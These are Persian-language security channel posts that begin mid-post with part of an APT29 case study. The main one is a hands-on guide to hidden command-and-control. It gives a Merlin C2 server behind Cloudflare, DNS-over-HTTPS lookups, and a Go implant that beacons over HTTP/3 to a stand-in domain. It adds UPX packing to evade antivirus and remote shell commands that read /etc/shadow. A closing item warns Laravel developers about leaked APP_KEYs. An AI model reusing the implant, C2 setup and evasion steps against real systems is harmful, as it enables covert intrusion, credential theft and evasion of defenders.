و pivot به سیستم‌های داخلی دیگر
🧪 فاز پنجم: فرار از شناسایی (EDR/Firewall/SOC Evasion)
APT29 با این ساختار حمله، تونست به‌شکلی عمل کنه که:
آنتی‌ویروس‌ها implant رو signature نمی‌زدن (به‌خاطر استفاده از Golang و فشرده‌سازی UPX)
فایروال‌ها ترافیک رو بلاک نمی‌کردن (چون می‌رفت به CDN شناخته‌شده)
تحلیل‌گرها حتی توی لاگ‌ها نمی‌فهمیدن قربانی با کی ارتباط داره (چون DNS و HTTP رمزنگاری شده بود)
سیستم تشخیص تهدید نتونست الگوی رفتاری implant رو شناسایی کنه چون beaconها غیرمنظم و adaptive بودن
⚔️ جمع‌بندی:
این حمله‌ی APT29 یه نمونه کلاسیک از یک Cyber Espionage Campaign پیشرفته بود.
چیزی که ترسناک‌ترش می‌کرد، استفاده از زیرساخت‌های معمول و قانونی مثل Cloudflare و QUIC بود؛ به‌جای سرورهای مشکوک یا دامنه‌های ناشناس.

نه باج‌خواهی کردند، نه صدا درآوردند. فقط اومدن، دزدیدن، و رفتن.
بدون حتی یه هشدار از سوی SOC قربانی...

🚨 این یه درس بزرگه:
هکرها دیگه از پورت 4444 و nc استفاده نمی‌کنن... اونا پشت Akamai و Cloudflare مخفی شدن و تو سکوت سیستم‌ها رو تصرف می‌کنن.


✍️نویسنده
@TryHackBox| Condor

🔥 قسمت دوم: مهندسی حمله APT29 با C2 مخفی HTTP/3 و DNS over HTTPS 🔥

🧬 فاز 1 – طراحی زیرساخت C2 با HTTPS و CDN (Cloudflare)
🎯 هدف:
پنهان کردن سرور فرمان‌دهی پشت یک CDN امن مثل Cloudflare
تا ترافیک implant عادی و رمزنگاری‌شده به‌نظر برسه
🧪 نمونه کد:
> دامنه‌ت رو وصل کن به سرور C2 واقعی:
# Cloudflare -> yourdomain.com -> your VPS IP (مثلاً 185.x.x.x) # ساخت C2 با Merlin git clone https://github.com/Ne0nd0g/merlin cd merlin make server # اجرای سرور C2 ./merlinServer -cert cert.pem -key key.pem -port 443
☠️ C2 آماده‌ست، پشت CDN Cloudflare مخفیه و از دید همه پنهانه.
🌐 فاز 2 – استفاده از DNS over HTTPS (DoH)
🎯 هدف:
جلوگیری از شناسایی دامنه C2 در لاگ‌های DNS سنتی
🧪 نمونه کد:

# resolve کردن دامنه C2 با DoH (cloudflare): curl -X POST "https://cloudflare-dns.com/dns-query" \ -H "accept: application/dns-json" \ --data-urlencode "name=secure-c2.com&type=A" 

🔒 نتیجه: DNS query توی HTTPS بسته‌بندی شده، رمزنگاری شده، غیرقابل رهگیری.
🚀 فاز 3 – ارتباط با C2 از طریق HTTP/3 (QUIC)
🎯 هدف:
استفاده از پروتکل مدرن، سریع، و ناشناخته برای bypass فایروال‌ها و NIDS/EDR
🧪 نمونه کد (Go implant ساده با HTTP/3):

// go.mod module stealthc2 go 1.19 require ( github.com/lucas-clemente/quic-go v0.27.1 ) // main.go package main import (  "crypto/tls"  "fmt"  "github.com/lucas-clemente/quic-go/http3"  "io/ioutil"  "net/http" ) func main() {  req, _ := http.NewRequest("POST", "https://secure-c2.com/beacon", nil)  req.Header.Set("User-Agent", "Mozilla/5.0")  roundTripper := &http3.RoundTripper{   TLSClientConfig: &tls.Config{InsecureSkipVerify: true},  }  defer roundTripper.Close()  client := &http.Client{   Transport: roundTripper,  }  resp, err := client.Do(req)  if err != nil {   fmt.Println("error:", err)   return  }  defer resp.Body.Close()  body, _ := ioutil.ReadAll(resp.Body)  fmt.Println(string(body)) } 

✅ Implant با QUIC ارتباط میزنه، از دید شبکه یه کاربر معمولی‌ه با مرورگر.
🦠 فاز 4 – Implant سبک و غیرقابل شناسایی
🎯 هدف:
کاهش اندازه، مبهم‌سازی فایل، فرار از آنتی‌ویروس
🧪 ساخت Implant با UPX:

GOOS=linux GOARCH=amd64 go build -o implant strip implant upx --best implant

نتیجه:
📦 فایل سبک‌تر از 1 مگابایت
🛡️ signature‌اش تو هیچ‌ AV مشهوری نیست
🔕 صدای هیچ EDRـی درنمیاد
🧪 فاز 5 – اجرای دستور از C2 (Command Execution)
در سمت سرور C2، implantها به beacon وصل می‌شن، حالا می‌تونی با ابزارهایی مثل Merlin command اجرا کنی:
# داخل Merlin CLI beacons interact <id> shell whoami

shell cat /etc/shadow

👑 نتیجه: Shell کامل از راه دور، با encryption، بدون شناسایی
⚠️ هشدار نهایی:
اگه هنوز داری از Metasploit و reverse_tcp استفاده می‌کنی، بدون که
APTها دارن از QUIC و DoH و CDN بهره می‌برن،
و تیم Blue فقط می‌تونه دعا کنه متوجه بشه چیزی داره اتفاق می‌افته...


✍️نویسنده
@TryHackBox| Condor

🚨 هشدار امنیتی برای توسعه‌دهندگان Laravel

بیش از 260 هزار کلید APP\_KEY از پروژه‌های Laravel به‌طور ناخواسته در GitHub افشا شده‌اند.
این افشاگری باعث آسیب‌پذیری بیش از 600 اپلیکیشن و خطر اجرای کد از راه دور (RCE) در حدود 120 مورد از آن‌ها شده است.

🔓 جزئیات:

* علت: انتشار فایل‌های env. شامل APP\_KEY و URL اپلیکیشن در مخازن عمومی
* خطر: مهاجمان می‌توانند با این اطلاعات، کنترل کامل سرور را به دست بگیرند

🛡 توصیه فوری:

1. اطمینان حاصل کنید فایل env. در Git منتشر نشده باشد
2. کلید APP_KEY را تغییر دهید
3. دسترسی‌های سرور را بررسی و کوکی‌ها را بی‌اعتبار کنید

📎 گزارش کامل:
The Hacker News
✍️نویسنده
@TryHackBox | The Chaos

#News #Git #Github #Laravel #CyberSecurity